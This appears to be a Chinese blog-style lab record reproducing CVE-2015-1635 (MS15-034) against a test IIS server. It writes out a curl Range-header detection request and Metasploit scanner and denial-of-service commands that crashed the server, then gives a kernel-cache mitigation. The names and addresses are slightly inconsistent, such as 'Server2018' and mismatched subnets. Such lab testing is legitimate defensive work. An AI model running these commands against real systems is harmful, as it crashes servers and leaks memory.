今天在一家银行里面护网看到一个cve-2015-1635的告警,打击面挺广的虽然是2015年的漏洞但是打击的面积是server 2008到server2012R2的版本对于现在来说server2012的服务器仍是不少的,今天做个试验记录下这个cve的漏洞。
实验开始:
Server2018iis 服务器搭建
看一下iis的ip
搭建成功确认没问题(配置全是默认的)
然后攻击者方面kali2019 ip:192.168.223.128
首先发送一条测试的请求
curl http://192.168.226.130 -H "Host: 192.168.226.130" -H "Range: bytes=0-18446744073709551615"
大致意思就是在http的请求头里面添加了Range: bytes=0-18446744073709551615然后给iis的服务器发过去如果返回的界面是
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Requested Range Not Satisfiable</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Requested Range Not Satisfiable</h2>
<hr><p>HTTP Error 416. The requested range is not satisfiable.</p>
</BODY></HTML>
就说明可能存在漏洞
试验截图:
具体验证
打开msfconsole
利用ms15_034_ulonglongadd漏洞进行攻击
实验截图:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.226.130
run
扫描说这个地址是脆弱的。
用ms15_034_ulonglongadd进行攻击
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.226.130
set threads 10
run
攻击完成 设备蓝屏了
修补方案:
将输出缓存里面的启用内核缓存禁掉(据说设备可能会慢一点)